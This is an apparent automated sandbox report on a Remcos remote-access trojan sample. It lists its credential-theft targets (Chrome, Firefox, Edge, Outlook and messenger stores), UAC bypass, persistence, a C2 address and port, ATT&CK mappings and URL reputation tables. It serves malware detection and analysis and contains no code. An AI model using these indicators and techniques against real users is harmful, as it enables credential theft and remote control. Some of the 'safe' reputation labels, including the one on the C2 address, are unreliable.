                  Source: antholite.exe, 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmp, antholite.exe, 00000002.00000002.4550520256.0000000001198000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: antholite.exe, 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerSM\f
                  Source: antholite.exe, 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerSM\ca
                  Source: antholite.exe, 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmp, antholite.exe, 00000002.00000002.4550520256.00000000011B2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerSM\
                  Source: antholite.exe, 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmp, logs.dat.2.drBinary or memory string: [Program Manager]
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00720698 cpuid 0_2_00720698
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: EnumSystemLocalesW,2_2_0045201B
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: EnumSystemLocalesW,2_2_004520B6
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_00452143
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: GetLocaleInfoW,2_2_00452393
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: EnumSystemLocalesW,2_2_00448484
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_004524BC
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: GetLocaleInfoW,2_2_004525C3
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_00452690
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: GetLocaleInfoW,2_2_0044896D
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: GetLocaleInfoA,2_2_0040F90C
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,2_2_00451D58
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: EnumSystemLocalesW,2_2_00451FD0
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00778195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00778195
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0075D27A GetUserNameW,0_2_0075D27A
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_0073B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0073B952
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_007042DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007042DE
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 2.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.3c00000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.antholite.exe.34e0000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.3c00000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.antholite.exe.34e0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000003.2135709723.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4551244504.0000000003DFF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.2168391666.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4550751358.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4550520256.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2233512989.0000000001904000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.2169326996.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.2131579771.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.2141891064.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: antholite.exe PID: 6364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: antholite.exe PID: 6444, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Contains functionality to steal Chrome passwords or cookies
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data2_2_0040BA4D
                  Contains functionality to steal Firefox passwords or cookies
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\2_2_0040BB6B
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: \key3.db2_2_0040BB6B
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Tries to steal Instant Messenger accounts or passwords
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                  Yara detected WebBrowserPassView password recovery tool
                  Source: Yara matchFile source: Process Memory Space: antholite.exe PID: 6364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: antholite.exe PID: 4180, type: MEMORYSTR
                  Source: antholite.exeBinary or memory string: WIN_81
                  Source: antholite.exeBinary or memory string: WIN_XP
                  Source: antholite.exe.0.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                  Source: antholite.exeBinary or memory string: WIN_XPe
                  Source: antholite.exeBinary or memory string: WIN_VISTA
                  Source: antholite.exeBinary or memory string: WIN_7
                  Source: antholite.exeBinary or memory string: WIN_8

                  Remote Access Functionality

                  barindex
                  Detected Remcos RAT
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-NKQ1SMJump to behavior
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-NKQ1SMJump to behavior
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 2.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.3c00000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.antholite.exe.34e0000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.antholite.exe.3c00000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.antholite.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.antholite.exe.34e0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000003.2135709723.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4551244504.0000000003DFF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.2168391666.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4550751358.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.4550520256.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2233512989.0000000001904000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.2169326996.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.2131579771.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.2141891064.00000000011FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: antholite.exe PID: 6364, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: antholite.exe PID: 6444, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: cmd.exe2_2_0040569A
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00781204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00781204
                  Source: C:\Users\user\Desktop\Rgh99876k7e.exeCode function: 0_2_00781806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00781806
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00911204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,2_2_00911204
                  Source: C:\Users\user\AppData\Local\Cocles\antholite.exeCode function: 2_2_00911806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,2_2_00911806

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information111
                  Scripting                  		2
                  Valid Accounts                  		1
                  Native API                  		111
                  Scripting                  		1
                  Exploitation for Privilege Escalation                  		1
                  Disable or Modify Tools                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		12
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts1
                  Command and Scripting Interpreter                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		121
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		2
                  Encrypted Channel                  		Exfiltration Over Bluetooth1
                  Defacement
                  Email AddressesDNS ServerDomain Accounts2
                  Service Execution                  		2
                  Valid Accounts                  		1
                  Bypass User Account Control                  		2
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		1
                  System Service Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		1
                  Remote Access Software                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCron1
                  Windows Service                  		2
                  Valid Accounts                  		1
                  DLL Side-Loading                  		3
                  Credentials In Files                  		3
                  File and Directory Discovery                  		Distributed Component Object Model121
                  Input Capture                  		2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd2
                  Registry Run Keys / Startup Folder                  		21
                  Access Token Manipulation                  		1
                  Bypass User Account Control                  		LSA Secrets38
                  System Information Discovery                  		SSH3
                  Clipboard Data                  		12
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                  Windows Service                  		1
                  Masquerading                  		Cached Domain Credentials231
                  Security Software Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items222
                  Process Injection                  		2
                  Valid Accounts                  		DCSync11
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job2
                  Registry Run Keys / Startup Folder                  		11
                  Virtualization/Sandbox Evasion                  		Proc Filesystem4
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                  Access Token Manipulation                  		/etc/passwd and /etc/shadow11
                  Application Window Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron222
                  Process Injection                  		Network Sniffing1
                  System Owner/User Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1503444 Sample: Rgh99876k7e.exe Startdate: 03/09/2024 Architecture: WINDOWS Score: 100 34 geoplugin.net 2->34 50 Suricata IDS alerts for network traffic 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 11 other signatures 2->56 8 Rgh99876k7e.exe 6 2->8         started        12 wscript.exe 1 2->12         started        signatures3 process4 file5 28 C:\Users\user\AppData\Local\...\antholite.exe, PE32 8->28 dropped 66 Binary is likely a compiled AutoIt script file 8->66 68 Found API chain indicative of sandbox detection 8->68 14 antholite.exe 3 19 8->14         started        70 Windows Scripting host queries suspicious COM object (likely to drop second stage) 12->70 19 antholite.exe 2 12->19         started        signatures6 process7 dnsIp8 36 192.210.150.26, 49704, 49705, 8787 AS-COLOCROSSINGUS United States 14->36 38 geoplugin.net 178.237.33.50, 49706, 80 ATOM86-ASATOM86NL Netherlands 14->38 30 C:\Users\user\AppData\...\antholite.vbs, data 14->30 dropped 32 C:\ProgramData\remcos\logs.dat, data 14->32 dropped 40 Multi AV Scanner detection for dropped file 14->40 42 Contains functionality to bypass UAC (CMSTPLUA) 14->42 44 Detected Remcos RAT 14->44 48 10 other signatures 14->48 21 antholite.exe 1 14->21         started        24 antholite.exe 1 14->24         started        26 antholite.exe 2 14->26         started        46 Binary is likely a compiled AutoIt script file 19->46 file9 signatures10 process11 signatures12 58 Binary is likely a compiled AutoIt script file 21->58 60 Tries to steal Instant Messenger accounts or passwords 21->60 62 Tries to harvest and steal browser information (history, passwords, etc) 21->62 64 Tries to steal Mail credentials (via file / registry access) 24->64

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Rgh99876k7e.exe63%ReversingLabsWin32.Backdoor.Remcos
                  Rgh99876k7e.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Cocles\antholite.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Cocles\antholite.exe63%ReversingLabsWin32.Backdoor.Remcos

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://www.imvu.comr0%URL Reputationsafe
                  http://www.imvu.com0%URL Reputationsafe
                  https://aefd.nelreports.net/api/report?cat=bingaotak0%URL Reputationsafe
                  https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                  http://geoplugin.net/json.gpSystem320%URL Reputationsafe
                  http://geoplugin.net/json.gp0%URL Reputationsafe
                  https://aefd.nelreports.net/api/report?cat=bingaot0%URL Reputationsafe
                  http://geoplugin.net/json.gp/C0%URL Reputationsafe
                  https://aefd.nelreports.net/api/report?cat=bingrms0%URL Reputationsafe
                  https://login.yahoo.com/config/login0%URL Reputationsafe
                  http://www.ebuddy.com0%URL Reputationsafe
                  https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=P0%Avira URL Cloudsafe
                  https://www.office.com/0%Avira URL Cloudsafe
                  https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949e0%Avira URL Cloudsafe
                  http://www.nirsoft.net0%Avira URL Cloudsafe
                  http://geoplugin.net/json.gp)0%Avira URL Cloudsafe
                  192.210.150.260%Avira URL Cloudsafe
                  http://geoplugin.net/json.gpu0%Avira URL Cloudsafe
                  https://www.google.com0%Avira URL Cloudsafe
                  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
                  https://login.li0%Avira URL Cloudsafe
                  https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf18270730%Avira URL Cloudsafe
                  https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AF0%Avira URL Cloudsafe
                  http://geoplugin.net/json.gpK0%Avira URL Cloudsafe
                  https://maps.windows.com/windows-app-web-link0%Avira URL Cloudsafe
                  https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe
                  http://geoplugin.net/json.gpM0%Avira URL Cloudsafe
                  http://www.imvu.comata0%Avira URL Cloudsafe
                  http://www.nirsoft.net/0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  geoplugin.net
                  		178.237.33.50
                  		truefalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    192.210.150.26true
                    • Avira URL Cloud: safe
                    		unknown
                    http://geoplugin.net/json.gpfalse
                    • URL Reputation: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=PbhvA838.tmp.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.office.com/bhvA838.tmp.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.imvu.comrantholite.exe, 00000002.00000002.4551500867.0000000004DC0000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://geoplugin.net/json.gp)antholite.exe, 00000002.00000003.2142233343.00000000011C7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://login.liantholite.exe, 00000003.00000002.2160855466.0000000000A9C000.00000004.00000010.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://fp-afd.azurefd.us/apc/trans.gif?0cf92be82316943650f2ee723bc6949ebhvA838.tmp.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.imvu.comantholite.exe, 00000002.00000002.4551500867.0000000004DC0000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000005.00000002.2147465927.000000000116D000.00000004.00000020.00020000.00000000.sdmp, antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.nirsoft.netantholite.exe, 00000003.00000002.2160954992.00000000011F4000.00000004.00000010.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://aefd.nelreports.net/api/report?cat=bingaotakbhvA838.tmp.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://deff.nelreports.net/api/report?cat=msnbhvA838.tmp.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://geoplugin.net/json.gpuantholite.exe, 00000002.00000002.4550896942.00000000012A7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://geoplugin.net/json.gpSystem32antholite.exe, 00000002.00000002.4550520256.0000000001177000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comantholite.exe, 00000002.00000002.4551500867.0000000004DC0000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://www.google.comantholite.exe, 00000002.00000002.4551500867.0000000004DC0000.00000040.10000000.00040000.00000000.sdmp, antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://fp-afd.azurefd.us/apc/trans.gif?94fb5ac9609bcb4cda0bf8acf1827073bhvA838.tmp.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-LAX31r5a&FrontEnd=AFbhvA838.tmp.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://aefd.nelreports.net/api/report?cat=bingaotbhvA838.tmp.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    http://geoplugin.net/json.gp/Cantholite.exe, 00000002.00000002.4549770141.0000000000400000.00000040.00001000.00020000.00000000.sdmp, antholite.exe, 00000002.00000002.4551036697.00000000034E0000.00000004.00001000.00020000.00000000.sdmp, antholite.exe, 00000007.00000002.2233641554.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, antholite.exe, 00000007.00000002.2232850434.0000000000400000.00000040.00001000.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://geoplugin.net/json.gpKantholite.exe, 00000002.00000002.4550896942.00000000012A7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://maps.windows.com/windows-app-web-linkbhvA838.tmp.3.drfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://geoplugin.net/json.gpMantholite.exe, 00000002.00000003.2142233343.00000000011C7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://aefd.nelreports.net/api/report?cat=bingrmsbhvA838.tmp.3.drfalse
                    • URL Reputation: safe
                    		unknown
                    https://www.google.com/accounts/serviceloginantholite.exefalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://login.yahoo.com/config/loginantholite.exefalse
                    • URL Reputation: safe
                    		unknown
                    http://www.nirsoft.net/antholite.exe, 00000005.00000002.2146630051.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
